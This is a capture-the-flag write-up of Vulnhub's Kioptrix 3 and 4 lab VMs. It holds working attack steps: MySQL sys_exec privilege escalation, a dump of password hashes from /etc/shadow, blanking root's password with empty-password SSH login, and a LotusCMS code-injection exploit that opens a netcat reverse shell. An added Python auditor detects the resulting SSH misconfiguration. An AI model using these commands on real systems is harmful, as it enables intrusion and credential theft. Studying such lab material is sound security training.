mysql> SELECT sys_exec('chown john.john /etc/shadow');                                                                                                                                                            
+-----------------------------------------+
| sys_exec('chown john.john /etc/shadow') |
+-----------------------------------------+
| NULL                                    | 
+-----------------------------------------+
1 row in set (0.00 sec)

mysql>  SELECT sys_exec('chown john.john /etc/passwd');  
+-----------------------------------------+
| sys_exec('chown john.john /etc/passwd') |
+-----------------------------------------+
| NULL                                    |
+-----------------------------------------+
1 row in set (0.00 sec)

mysql> SELECT sys_exec('chown -R john.john /root'); 
+--------------------------------------+
| sys_exec('chown -R john.john /root') |
+--------------------------------------+
| NULL                                 | 
+--------------------------------------+
1 row in set (0.01 sec)

mysql> exit

john@Kioptrix4:/home/loneferret$ cd /root
john@Kioptrix4:/root$ ls
congrats.txt  lshell-0.9.12
john@Kioptrix4:/root$ ls -la
total 44
drwxr-xr-x  4 john john 4096 2012-02-06 18:46 .
drwxr-xr-x 21 root root 4096 2012-02-06 18:41 ..
-rw-------  1 john john   59 2012-02-06 20:24 .bash_history
-rw-r--r--  1 john john 2227 2007-10-20 07:51 .bashrc
-rw-r--r--  1 john john  625 2012-02-06 10:48 congrats.txt
-rw-r--r--  1 john john    1 2012-02-05 10:38 .lhistory
drwxr-xr-x  8 john john 4096 2012-02-04 17:01 lshell-0.9.12
-rw-------  1 john john    1 2012-02-05 10:38 .mysql_history
-rw-------  1 john john    5 2012-02-06 18:38 .nano_history
-rw-r--r--  1 john john  141 2007-10-20 07:51 .profile
drwx------  2 john john 4096 2012-02-06 11:43 .ssh

john@Kioptrix4:/root$ cat congrats.txt
Congratulations!
You've got root.

There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.

If you haven't already, check out the other VMs available on:
www.kioptrix.com

Thanks for playing,
loneferret

Let us continue the game:

cat /etc/shadow
root:$1$5GMEyqwV$x0b1nMsYFXvczN0yI0kBB.:15375:0:99999:7:::
daemon:*:15374:0:99999:7:::
bin:*:15374:0:99999:7:::
sys:*:15374:0:99999:7:::
sync:*:15374:0:99999:7:::
games:*:15374:0:99999:7:::
man:*:15374:0:99999:7:::
lp:*:15374:0:99999:7:::
mail:*:15374:0:99999:7:::
news:*:15374:0:99999:7:::
uucp:*:15374:0:99999:7:::
proxy:*:15374:0:99999:7:::
www-data:*:15374:0:99999:7:::
backup:*:15374:0:99999:7:::
list:*:15374:0:99999:7:::
irc:*:15374:0:99999:7:::
gnats:*:15374:0:99999:7:::
nobody:*:15374:0:99999:7:::
libuuid:!:15374:0:99999:7:::
dhcp:*:15374:0:99999:7:::
syslog:*:15374:0:99999:7:::
klog:*:15374:0:99999:7:::
mysql:!:15374:0:99999:7:::
sshd:*:15374:0:99999:7:::
loneferret:$1$/x6RLO82$43aCgYCrK7p2KFwgYw9iU1:15375:0:99999:7:::
john:$1$H.GRhlY6$sKlytDrwFEhu5dULXItWw/:15374:0:99999:7:::
robert:$1$rQRWeUha$ftBrgVvcHYfFFFk6Ut6cM1:15374:0:99999:7:::


Let us change /etc/passwd to this:
root::0:0:root:/root:/bin/bash

And /etc/shadow to this:
root::::

Now let us change the SSH config:

mysql> SELECT sys_exec('chown -R john.john /etc/ssh');
+-----------------------------------------+
| sys_exec('chown -R john.john /etc/ssh') |
+-----------------------------------------+
| NULL                                    |
+-----------------------------------------+
1 row in set (0.01 sec)

vim sshd_config

# Package generated configuration file
# See the sshd(8) manpage for details

# What ports, IPs and protocols we listen for
Port 22
# Use these options to restrict which interfaces/protocols sshd will bind to
#ListenAddress ::
ListenAddress 0.0.0.0
Protocol 2
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
#Privilege Separation is turned on for security
#UsePrivilegeSeparation yes

# Lifetime and size of ephemeral version 1 server key
KeyRegenerationInterval 3600
ServerKeyBits 768

# Logging
SyslogFacility AUTH
LogLevel INFO

# Authentication:
LoginGraceTime 120
PermitRootLogin yes
StrictModes yes

RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile      %h/.ssh/authorized_keys

# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# For this to work you will also need host keys in /etc/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
#IgnoreUserKnownHosts yes

# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords yes

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

# Change to no to disable tunnelled clear text passwords
#PasswordAuthentication yes

# Kerberos options
#KerberosAuthentication no
#KerberosGetAFSToken no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes

X11Forwarding yes
X11DisplayOffset 10
PrintMotd no
PrintLastLog no
TCPKeepAlive yes
#UseLogin no

#MaxStartups 10:30:60
#Banner /etc/issue.net

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

Subsystem sftp /usr/lib/openssh/sftp-server

UsePAM no
"sshd_config" 77L, 1872C written


Let's reboot the system so sshd picks up the new config:
mysql> SELECT sys_exec('reboot');                

Broadcast message from root@Kioptrix4
(unknown) at 15:40 ...

The system is going down for reboot NOW!
+--------------------+
| sys_exec('reboot') |
+--------------------+
| NULL               |
+--------------------+
1 row in set (0.02 sec)


Game over:
ssh root@192.168.180.136
root@Kioptrix4:~# ls -la
total 44
drwxr-xr-x  4 john john 4096 2012-02-06 18:46 .
drwxr-xr-x 21 root root 4096 2012-02-06 18:41 ..
-rw-------  1 john john   62 2016-07-05 15:51 .bash_history
-rw-r--r--  1 john john 2227 2007-10-20 07:51 .bashrc
-rw-r--r--  1 john john  625 2012-02-06 10:48 congrats.txt
-rw-r--r--  1 john john    1 2012-02-05 10:38 .lhistory
drwxr-xr-x  8 john john 4096 2012-02-04 17:01 lshell-0.9.12
-rw-------  1 john john    1 2012-02-05 10:38 .mysql_history
-rw-------  1 john john    5 2012-02-06 18:38 .nano_history
-rw-r--r--  1 john john  141 2007-10-20 07:51 .profile
drwx------  2 john john 4096 2016-07-05 15:23 .ssh
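An added defender's check for the persistence just demonstrated (example code, not from the write-up): it parses sshd_config, shadow and passwd text and flags the combination of PermitRootLogin yes, PermitEmptyPasswords yes and UsePAM no, plus any account whose password field is empty or whose entry was hand-edited into the wrong shape. The sample inputs are constructed from the values shown above; the one hash in them is a placeholder.

```python
"""Audit sshd_config / shadow / passwd text for the passwordless-root setup
shown above.  Added example, not part of the original write-up; the sample
inputs are constructed from the values on this page."""
import re

# sshd keywords are case-insensitive; these values, together, let anyone log in
# as root with no password at all (UsePAM no also sidesteps PAM account policy).
RISKY_SSHD = {
    "permitrootlogin": "yes",
    "permitemptypasswords": "yes",
    "usepam": "no",
}

# Constructed excerpt of the sshd_config written in the walkthrough.
SAMPLE_SSHD_CONFIG = """\
# Authentication:
LoginGraceTime 120
PermitRootLogin yes
StrictModes yes
# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords yes
#PasswordAuthentication yes
UsePAM no
"""

# Constructed: root's shadow line as the walkthrough rewrote it, plus two
# ordinary entries (the hash is a placeholder, not a real value).
SAMPLE_SHADOW = """\
root::::
daemon:*:15374:0:99999:7:::
john:$1$placeholder$placeholderplaceholder:15374:0:99999:7:::
"""
SAMPLE_PASSWD = """\
root::0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
"""


def parse_sshd_config(text):
    """Return {keyword: value} for active directives, keeping the FIRST value
    seen for a keyword, which is how sshd resolves duplicates."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        if len(parts) == 2:
            settings.setdefault(parts[0].lower(), parts[1].strip())
    return settings


def sshd_findings(text):
    """Names of the risky directives that are set to their dangerous value."""
    settings = parse_sshd_config(text)
    return sorted(k for k, bad in RISKY_SSHD.items()
                  if settings.get(k, "").lower() == bad)


def account_findings(text, expected_fields):
    """Flag entries with an empty password field (login without a password)
    or with the wrong number of colon-separated fields (a hand-edited line,
    like the 'root::::' written above).  Use 9 for shadow, 7 for passwd."""
    findings = []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        fields = raw.split(":")
        user = fields[0]
        if len(fields) > 1 and fields[1] == "":
            findings.append((user, "empty password field"))
        if len(fields) != expected_fields:
            findings.append((user, "malformed entry"))
    return findings


def audit(sshd_text, shadow_text, passwd_text):
    """Combine the checks into one report; an empty report means nothing found."""
    report = {}
    ssh = sshd_findings(sshd_text)
    if ssh:
        report["sshd_config"] = ssh
    for name, text, n in (("shadow", shadow_text, 9), ("passwd", passwd_text, 7)):
        hits = account_findings(text, n)
        if hits:
            report[name] = hits
    return report


if __name__ == "__main__":
    for section, hits in audit(SAMPLE_SSHD_CONFIG, SAMPLE_SHADOW, SAMPLE_PASSWD).items():
        print(section, hits)
```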

Regards,
Yuriy Stanchev/URIX

Kioptrix Level 3

This document is for educational purposes only, I take no responsibility for other people's actions. This is a review of the VM Kioptrix L3 from Vulnhub - a site dedicated to penetration testing Capture The Flag challenges.

Scenario: let's try the following:
netdiscover -r 192.168.180.0/24
nmap -sV -T4 -O -F --version-light 192.168.180.139
nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.139
nmap -sC -sU -T4 -A -v -v -Pn --top-ports 200 192.168.180.139
dirb http://192.168.180.139
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.139/FUZZ
nikto -h 192.168.180.139

In case there is SMB:
smbclient -N -L 192.168.180.139
enum4linux -a 192.168.180.139


 Currently scanning: Finished!   |   Screen View: Unique Hosts                 
                                                                               
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.180.1   00:50:56:c0:00:08      1      60  VMware, Inc.                
 192.168.180.2   00:50:56:f9:f6:4a      1      60  VMware, Inc.                
 192.168.180.139 00:0c:29:e3:3f:e5      1      60  VMware, Inc.                
 192.168.180.254 00:50:56:ee:9d:40      1      60  VMware, Inc.    

nmap -sV -T4 -O -F --version-light 192.168.180.139
Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-15 01:38 EDT
Nmap scan report for 192.168.180.139
Host is up (0.00019s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
MAC Address: 00:0C:29:E3:3F:E5 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.94 seconds

nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.139

Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-15 01:39 EDT
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|   2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:E3:3F:E5 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
TCP/IP fingerprint:

Uptime guess: 0.001 days (since Mon Aug 15 01:38:55 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=205 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.18 ms 192.168.180.139

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 01:39
Completed NSE at 01:39, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 01:39
Completed NSE at 01:39, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.48 seconds
           Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.346KB)

nmap -sC -sU -T4 -A -v -v -Pn --top-ports 200 192.168.180.139

Nothing interesting from this scan.

dirb http://192.168.180.139

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Aug 15 01:49:58 2016
URL_BASE: http://192.168.180.139/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.180.139/ ----
==> DIRECTORY: http://192.168.180.139/cache/                                   
==> DIRECTORY: http://192.168.180.139/core/                                    
+ http://192.168.180.139/data (CODE:403|SIZE:326)                              
+ http://192.168.180.139/favicon.ico (CODE:200|SIZE:23126)                     
==> DIRECTORY: http://192.168.180.139/gallery/                                 
+ http://192.168.180.139/index.php (CODE:200|SIZE:1819)                        
==> DIRECTORY: http://192.168.180.139/modules/                                 
==> DIRECTORY: http://192.168.180.139/phpmyadmin/                              
+ http://192.168.180.139/server-status (CODE:403|SIZE:335)                     
==> DIRECTORY: http://192.168.180.139/style/                                   
                                                                               
---- Entering directory: http://192.168.180.139/cache/ ----
+ http://192.168.180.139/cache/index.html (CODE:200|SIZE:1819)                 
                                                                               
---- Entering directory: http://192.168.180.139/core/ ----
==> DIRECTORY: http://192.168.180.139/core/controller/                         
+ http://192.168.180.139/core/index.php (CODE:200|SIZE:0)                      
==> DIRECTORY: http://192.168.180.139/core/lib/                                
==> DIRECTORY: http://192.168.180.139/core/model/                              
==> DIRECTORY: http://192.168.180.139/core/view/                               
                                                                               
---- Entering directory: http://192.168.180.139/gallery/ ----
+ http://192.168.180.139/gallery/index.php (CODE:500|SIZE:5650)                
==> DIRECTORY: http://192.168.180.139/gallery/photos/                          
==> DIRECTORY: http://192.168.180.139/gallery/themes/                          
                                                                               
---- Entering directory: http://192.168.180.139/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.139/phpmyadmin/ ----
+ http://192.168.180.139/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)          
+ http://192.168.180.139/phpmyadmin/index.php (CODE:200|SIZE:8136)             
==> DIRECTORY: http://192.168.180.139/phpmyadmin/js/                           
==> DIRECTORY: http://192.168.180.139/phpmyadmin/lang/                         
+ http://192.168.180.139/phpmyadmin/libraries (CODE:403|SIZE:342)              
+ http://192.168.180.139/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)              
==> DIRECTORY: http://192.168.180.139/phpmyadmin/scripts/                      
==> DIRECTORY: http://192.168.180.139/phpmyadmin/themes/                       
                                                                               
---- Entering directory: http://192.168.180.139/style/ ----
+ http://192.168.180.139/style/admin.php (CODE:200|SIZE:356)                   
+ http://192.168.180.139/style/index.php (CODE:200|SIZE:0)                     
                                                                               
---- Entering directory: http://192.168.180.139/core/controller/ ----
+ http://192.168.180.139/core/controller/index.php (CODE:200|SIZE:0)           
                                                                               
---- Entering directory: http://192.168.180.139/core/lib/ ----
+ http://192.168.180.139/core/lib/index.php (CODE:200|SIZE:0)                  
                                                                               
---- Entering directory: http://192.168.180.139/core/model/ ----
+ http://192.168.180.139/core/model/index.php (CODE:200|SIZE:0)                
                                                                               
---- Entering directory: http://192.168.180.139/core/view/ ----
+ http://192.168.180.139/core/view/index.php (CODE:200|SIZE:0)                 
                                                                               
---- Entering directory: http://192.168.180.139/gallery/photos/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.139/gallery/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.139/phpmyadmin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.139/phpmyadmin/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.139/phpmyadmin/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.139/phpmyadmin/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Mon Aug 15 01:50:07 2016
DOWNLOADED: 46120 - FOUND: 17


wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.139/FUZZ
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.180.139/FUZZ
Total requests: 3036

==================================================================
ID Response   Lines      Word         Chars          Request    
==================================================================

00489:  C=301      9 L      31 W    357 Ch  "cache"
00692:  C=301      9 L      31 W    356 Ch  "core"
00779:  C=403     10 L      33 W    326 Ch  "data"
02082:  C=301      9 L      31 W    362 Ch  "phpmyadmin"
03035:  C=404      9 L      35 W    324 Ch  "yomama"


^C
Finishing pending requests...


nikto -h 192.168.180.139
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.180.139
+ Target Hostname:    192.168.180.139
+ Target Port:        80
+ Start Time:         2016-08-15 02:01:11 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun  5 15:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7534 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2016-08-15 02:01:22 (GMT-4) (11 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


http://192.168.180.139/phpmyadmin/Documentation.html
phpMyAdmin 2.11.3 Documentation

http://192.168.180.139/phpmyadmin
Welcome to phpMyAdmin 2.11.3deb1ubuntu1.3

http://192.168.180.139/phpmyadmin/changelog.php
2.11.3.0 (2007-12-08)

http://192.168.180.139/index.php?system=Admin

Proudly Powered by: LotusCMS

http://192.168.180.139/gallery/index.php

At this point I added kioptrix3.com to the hosts file.

Did not work:
https://www.exploit-db.com/exploits/15964/

Let's try this one:
https://github.com/Hood3dRob1n/LotusCMS-Exploit

./lotusRCE.sh kioptrix3.com /

Path found, now to check for vuln....

</html>Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!

About to try and inject reverse shell....
what IP to use?
192.168.180.132
What PORT?
443

OK, open your local listener and choose the method for back connect:
1) NetCat -e    3) NetCat Backpipe 5) Exit
2) NetCat /dev/tcp  4) NetCat FIFO
#? 1

nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.180.132] from (UNKNOWN) [192.168.180.139] 47705

ps -aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.3   2844  1692 ?        Ss   04:33   0:00 /sbin/init
root         2  0.0  0.0      0     0 ?        S<   04:33   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S<   04:33   0:00 [migration/0]
root         4  0.0  0.0      0     0 ?        S<   04:33   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   04:33   0:00 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S<   04:33   0:00 [events/0]
root         7  0.0  0.0      0     0 ?        S<   04:33   0:00 [khelper]
root        41  0.0  0.0      0     0 ?        S<   04:33   0:00 [kblockd/0]
root        44  0.0  0.0      0     0 ?        S<   04:33   0:00 [kacpid]
root        45  0.0  0.0      0     0 ?        S<   04:33   0:00 [kacpi_notify]
root       104  0.0  0.0      0     0 ?        S<   04:33   0:00 [kseriod]
root       143  0.0  0.0      0     0 ?        S    04:33   0:00 [pdflush]
root       144  0.0  0.0      0     0 ?        S    04:33   0:00 [pdflush]
root       145  0.0  0.0      0     0 ?        S<   04:33   0:00 [kswapd0]
root       187  0.0  0.0      0     0 ?        S<   04:33   0:00 [aio/0]
root      1272  0.0  0.0      0     0 ?        S<   04:33   0:00 [ata/0]
root      1275  0.0  0.0      0     0 ?        S<   04:33   0:00 [ata_aux]
root      1284  0.0  0.0      0     0 ?        S<   04:33   0:00 [scsi_eh_0]
root      1287  0.0  0.0      0     0 ?        S<   04:33   0:00 [scsi_eh_1]
root      2208  0.0  0.0      0     0 ?        S<   04:33   0:00 [kjournald]
root      2364  0.0  0.1   2224   664 ?        S<s  04:34   0:00 /sbin/udevd --daemon
root      2732  0.0  0.0      0     0 ?        S<   04:34   0:00 [kpsmoused]
root      3864  0.0  0.1   1716   516 tty4     Ss+  04:34   0:00 /sbin/getty 38400 tty4
root      3865  0.0  0.0   1716   512 tty5     Ss+  04:34   0:00 /sbin/getty 38400 tty5
root      3869  0.0  0.1   1716   516 tty2     Ss+  04:34   0:00 /sbin/getty 38400 tty2
root      3870  0.0  0.1   1716   516 tty3     Ss+  04:34   0:00 /sbin/getty 38400 tty3
root      3872  0.0  0.1   1716   516 tty6     Ss+  04:34   0:00 /sbin/getty 38400 tty6
syslog    3913  0.0  0.1   1936   644 ?        Ss   04:34   0:00 /sbin/syslogd -u syslog
root      3932  0.0  0.1   1872   548 ?        S    04:34   0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
klog      3934  0.0  0.3   3028  1856 ?        Ss   04:34   0:00 /sbin/klogd -P /var/run/klogd/kmsg
root      3959  0.0  0.1   5316  1020 ?        Ss   04:34   0:00 /usr/sbin/sshd
root      4015  0.0  0.1   1772   524 ?        S    04:34   0:00 /bin/sh /usr/bin/mysqld_safe
mysql     4057  0.0  3.2 127228 16668 ?        Sl   04:34   0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root      4059  0.0  0.1   1700   552 ?        S    04:34   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
daemon    4123  0.0  0.0   1984   420 ?        Ss   04:34   0:00 /usr/sbin/atd
root      4142  0.0  0.1   2104   892 ?        Ss   04:34   0:00 /usr/sbin/cron
root      4165  0.0  1.2  20780  6392 ?        Ss   04:34   0:00 /usr/sbin/apache2 -k start
www-data  4184  0.0  1.2  21272  6604 ?        S    04:34   0:00 /usr/sbin/apache2 -k start
www-data  4185  0.0  1.5  22032  7852 ?        S    04:34   0:00 /usr/sbin/apache2 -k start
www-data  4186  0.0  1.4  21732  7332 ?        S    04:34   0:00 /usr/sbin/apache2 -k start
www-data  4187  0.0  1.6  22280  8364 ?        S    04:34   0:00 /usr/sbin/apache2 -k start
www-data  4188  0.0  1.3  21308  6996 ?        S    04:34   0:00 /usr/sbin/apache2 -k start
dhcp      4201  0.0  0.1   2440   764 ?        Ss   04:34   0:00 dhclient
root      4208  0.0  0.0   1716   508 tty1     Ss+  04:34   0:00 /sbin/getty 38400 tty1
www-data  4209  0.0  1.2  21304  6692 ?        S    04:37   0:00 /usr/sbin/apache2 -k start
www-data  4240  0.0  1.2  21272  6624 ?        S    04:51   0:00 /usr/sbin/apache2 -k start
www-data  4241  0.0  1.3  21404  6736 ?        S    04:51   0:00 /usr/sbin/apache2 -k start
www-data  4242  0.0  1.6  22560  8304 ?        S    04:51   0:00 /usr/sbin/apache2 -k start
www-data  4254  0.0  1.2  21280  6612 ?        S    04:51   0:00 /usr/sbin/apache2 -k start
www-data  4326  0.0  0.0   1772   488 ?        S    05:45   0:00 sh -c nc -e /bin/sh 192.168.180.132 443
www-data  4327  0.0  0.0   1772   488 ?        R    05:45   0:00 sh
www-data  4328  0.0  0.1   2364   920 ?        R    05:46   0:00 ps -aux

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

ls -la /home/loneferret/
total 64
drwxr-xr-x 3 loneferret loneferret  4096 Apr 17  2011 .
drwxr-xr-x 5 root       root        4096 Apr 16  2011 ..
-rw-r--r-- 1 loneferret users         13 Apr 18  2011 .bash_history
-rw-r--r-- 1 loneferret loneferret   220 Apr 11  2011 .bash_logout
-rw-r--r-- 1 loneferret loneferret  2940 Apr 11  2011 .bashrc
-rw------- 1 root       root          15 Apr 15  2011 .nano_history
-rw-r--r-- 1 loneferret loneferret   586 Apr 11  2011 .profile
drwx------ 2 loneferret loneferret  4096 Apr 14  2011 .ssh
-rw-r--r-- 1 loneferret loneferret     0 Apr 11  2011 .sudo_as_admin_successful
-rw-r--r-- 1 root       root         224 Apr 16  2011 CompanyPolicy.README
-rwxrwxr-x 1 root       root       26275 Jan 12  2011 checksec.sh

loneferret is a sudo user (note the .sudo_as_admin_successful file).

cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in your immediate termination.

DG
CEO

cat /etc/issue
DISCLAIMER!
We at Kioptrix are not responsible for any damage directly, or indirectly, 
caused by using this system. We suggest you do not connect this installation
to the Internet. It is, after all, a vulnerable setup. 
Please keep this in mind when playing the game.

This machine is setup to use DHCP.
Before playing the game, please modify your attacker's hosts file.
<ip> kioptrix3.com
